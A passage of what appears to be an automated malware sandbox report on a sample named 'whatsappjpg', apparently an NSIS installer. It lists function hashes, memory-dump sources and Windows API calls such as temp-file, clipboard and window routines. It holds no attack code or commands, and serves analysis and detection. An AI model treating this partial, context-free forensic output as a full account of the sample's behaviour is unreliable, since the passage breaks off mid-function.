Instruction Fuzzy Hash: C80119327005205BDA25966DA891B3BB7D6DBCAB24F20887DF50AD7341DF26EC134395

Function 00166B88 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0a401f975ba09e55ae999dde6ec555ca41999efc30957870cf3db086bf53ff
Instruction ID: c0236c62c6b889a18993ea419e64de93dac4a8893b6856ffad03519ea3bd4a2e
Opcode Fuzzy Hash: 1d0a401f975ba09e55ae999dde6ec555ca41999efc30957870cf3db086bf53ff
Instruction Fuzzy Hash: 9201F272B042448FD715A7B984246AE7FE2EFCA300F10806ED046DB392DF758C459BA2

Function 394DD8C0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 828cb5cb64047cb27d90c0c4c070bd5cef660a7f73496d4570b4194ed34b3054
Instruction ID: 4d965e0f648b2fa1e4e32fb8f1f004580e578a9081ad412f44b64e39365dc4f7
Opcode Fuzzy Hash: 828cb5cb64047cb27d90c0c4c070bd5cef660a7f73496d4570b4194ed34b3054
Instruction Fuzzy Hash: F801AF39B001108FE705DA7CC862B5BB7E6DB89750F508829E40BD7752EE26FD068790

Function 0016713A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8b75b7b04d154b3977a2f77896af8211a3fc8f1239b09acf17551655b10140
Instruction ID: d37064b87a2e1f001f2c81f38c0d8f2577ae411f319f28c5ed71786ac276c857
Opcode Fuzzy Hash: 4b8b75b7b04d154b3977a2f77896af8211a3fc8f1239b09acf17551655b10140
Instruction Fuzzy Hash: 32012D70B042149FD744EF784C023BE7BA59B46318F24846ADA05EB3C2E736C9128794

Function 394DFD80 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e5117e66d1f4e34cdcf3b7773f8a74bfa3667aa92435f6bcc47bce3283685d
Instruction ID: 30e8c7ec527a3437801836641e7b3a3c1600dd6caa0504b456431f20d6baf848
Opcode Fuzzy Hash: 80e5117e66d1f4e34cdcf3b7773f8a74bfa3667aa92435f6bcc47bce3283685d
Instruction Fuzzy Hash: F3012D35B203249BDB149A64D86298E7376FB89354F10457AE405E7342DB31FC05C790

Function 00166F60 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819207502.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_160000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ca3bbf66f4f9bf4dfe55613f339e9efaa7afc45e3684fe4fde45a9108f9c7f
Instruction ID: ef1fd7ae45aa069efece11798ef38a6bd7f8816a3bdfda17e7a624ed746096f8
Opcode Fuzzy Hash: 85ca3bbf66f4f9bf4dfe55613f339e9efaa7afc45e3684fe4fde45a9108f9c7f
Instruction Fuzzy Hash: 26F0F43131C11397E7241A79BC383763598EF20741F1554F6B826D56D0EF59DCE09252

Function 394DE4C8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c284b038c7d910f7a4f562de9e34b72cc421109129bc7bc56b29e1a7790684
Instruction ID: c56d1e1c377448810ef7d46edbf7d553f7dfb3247ac0a69d5e431a5183d45ba0
Opcode Fuzzy Hash: 45c284b038c7d910f7a4f562de9e34b72cc421109129bc7bc56b29e1a7790684
Instruction Fuzzy Hash: E0F0A73AE002598BEB248AA9D46578BB7A9D7457A0F004437E90AE7341D631E80587A1

Function 394DB89E Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba3644a153f1c60882d3bd29c6bf04dd2b5b0487fedef3aea1f904cc8f35c47
Instruction ID: b0acc23cf84f8ad68889b6d467c8e3e747e108ba69e567050e479a64d37df6ec
Opcode Fuzzy Hash: aba3644a153f1c60882d3bd29c6bf04dd2b5b0487fedef3aea1f904cc8f35c47
Instruction Fuzzy Hash: BBF0A77E704356DBAB148D4299712647761AB443A0F4040A7E900A7243EB75EA02C7A0

Function 394D7BE9 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a63f16db1c26bcdb57bf267823ed954759831d4eaa95da598e98fc41ee38d53a
Instruction ID: 8ac3780160910cb3278d2581bf76c3d34a658492bc432c7558b44a5da3e369f0
Opcode Fuzzy Hash: a63f16db1c26bcdb57bf267823ed954759831d4eaa95da598e98fc41ee38d53a
Instruction Fuzzy Hash: 71F0FE74A10119DFDB14DF94D969BAEBBB2FF84B04F604119E002A7395CB751C45CF90

Non-executed Functions

Function 00404B0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B26
GetDlgItem.USER32(?,00000408), ref: 00404B31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
LoadBitmapW.USER32(0000006E), ref: 00404B8E
SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
DeleteObject.GDI32(00000000), ref: 00404C04
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
ShowWindow.USER32(?,00000005), ref: 00404D5E
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
ImageList_Destroy.COMCTL32(?), ref: 00404F2E
GlobalFree.KERNEL32(?), ref: 00404F3E
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
SendMessageW.USER32(?,00001102,?,?), ref: 00405060
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
InvalidateRect.USER32(?,00000000,?), ref: 0040508F
ShowWindow.USER32(?,00000000), ref: 004050DD
GetDlgItem.USER32(?,000003FE), ref: 004050E8
ShowWindow.USER32(00000000), ref: 004050EF

Strings

M, xrefs: 00404CB8
, xrefs: 004050C7
N, xrefs: 00404D99

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
Opcode Fuzzy Hash: 76a51ec3fa87313c88060479e11805ee9570431e44e9bc5a31b06844deabf825
Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58

Function 00403358 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 335stringfilecomCOMMON

Download Yara Rule

APIs

#17.COMCTL32 ref: 00403377
SetErrorMode.KERNEL32(00008001), ref: 00403382
OleInitialize.OLE32(00000000), ref: 00403389

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033D9
CharNextW.USER32(00000000,00434000,00000020), ref: 00403400
GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 00403509
GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351A
lstrcatW.KERNEL32(00436800,\Temp), ref: 00403526
GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353A
lstrcatW.KERNEL32(00436800,Low), ref: 00403542
SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403553
SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355B
DeleteFileW.KERNEL32(00436000), ref: 0040356F
OleUninitialize.OLE32(?), ref: 0040361F
ExitProcess.KERNEL32 ref: 0040363F
lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364B
lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403657
CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403663
SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366A
DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
CopyFileW.KERNEL32(00437800,0041FE90,?), ref: 004036D8
CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
ExitProcess.KERNEL32 ref: 004037BA

Strings

TEMP, xrefs: 0040354E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336B
Error launching installer, xrefs: 004035D6
NSIS Error, xrefs: 004033B7
Low, xrefs: 0040353C
\Temp, xrefs: 00403520
TMP, xrefs: 00403556
~nsu.tmp, xrefs: 00403645
SeShutdownPrivilege, xrefs: 0040376D

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-1875889550
Opcode ID: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
Opcode Fuzzy Hash: b8fba2d3f2b1c611e22a85b6af37489a6fd7a8924b7a7b1bf72e15cfe01e73cf
Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

Function 00405770 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00436800,76F92EE0,00434000), ref: 00405799
lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,76F92EE0,00434000), ref: 004057E1
lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 00405804
lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040580A
FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040581A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
FindClose.KERNEL32(00000000), ref: 004058C9

Strings

\*.*, xrefs: 004057DB

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E

Function 0040653D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44

Function 0040622B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,76F92EE0,00405790,?,00436800,76F92EE0), ref: 00406236
FindClose.KERNEL32(00000000), ref: 00406242

Strings

WB, xrefs: 0040622C

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: WB
API String ID: 2295610775-2854515933
Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405330
GetDlgItem.USER32(?,000003EE), ref: 0040533F
GetClientRect.USER32(?,?), ref: 0040537C
GetSystemMetrics.USER32(00000015), ref: 00405384
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
ShowWindow.USER32(?,00000008), ref: 00405420
GetDlgItem.USER32(?,000003EC), ref: 00405441
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
GetDlgItem.USER32(?,000003F8), ref: 0040534E

Part of subcall function 00404162: SendMessageW.USER32(00000028,?,?,00403F8E), ref: 00404170

GetDlgItem.USER32(?,000003EC), ref: 00405493
CreateThread.KERNEL32(00000000,00000000,Function_00005265,00000000), ref: 004054A1
CloseHandle.KERNEL32(00000000), ref: 004054A8
ShowWindow.USER32(00000000), ref: 004054CC
ShowWindow.USER32(?,00000008), ref: 004054D1
ShowWindow.USER32(00000008), ref: 0040551B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
CreatePopupMenu.USER32 ref: 00405560
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
GetWindowRect.USER32(?,?), ref: 00405594
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
OpenClipboard.USER32(00000000), ref: 004055F5
EmptyClipboard.USER32 ref: 004055FB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
GlobalLock.KERNEL32(00000000), ref: 00405611
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
GlobalUnlock.KERNEL32(00000000), ref: 00405645
SetClipboardData.USER32(0000000D,00000000), ref: 00405650
CloseClipboard.USER32 ref: 00405656

Strings

{, xrefs: 00405539

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
Opcode Fuzzy Hash: 1a5139e6078aa1fdd5380d113510ef6b25ff983d9f8c9825e1a42f9c65a41b23
Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,?), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
EnableWindow.USER32(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 1926e66dbe86b771c32413573697ed931c6ac126e5224ec9b851fb9904e66452
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 004038B2 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,76F93420,00000000,00434000), ref: 00403933
lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B3
lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(00427180), ref: 004039D1
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

.exe, xrefs: 004039C0
RichEd32, xrefs: 00403AF1
RichEdit20W, xrefs: 00403AFE, 00403B04
.DEFAULT\Control Panel\International, xrefs: 0040391E
RichEdit, xrefs: 00403B0D
RichEd20, xrefs: 00403AE6
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
_Nb, xrefs: 00403A36, 00403A9E

Memory Dump Source

Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-1115850852
Opcode ID: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 8e4e2db869f3f3991819afcb55c59cc8f3ae99e000e4feef3646a4c772ef4b1b
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 004042CA Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404368
GetDlgItem.USER32(?,000003E8), ref: 0040437C
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404399
GetSysColor.USER32(?), ref: 004043AA
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
lstrlenW.KERNEL32(?), ref: 004043CB
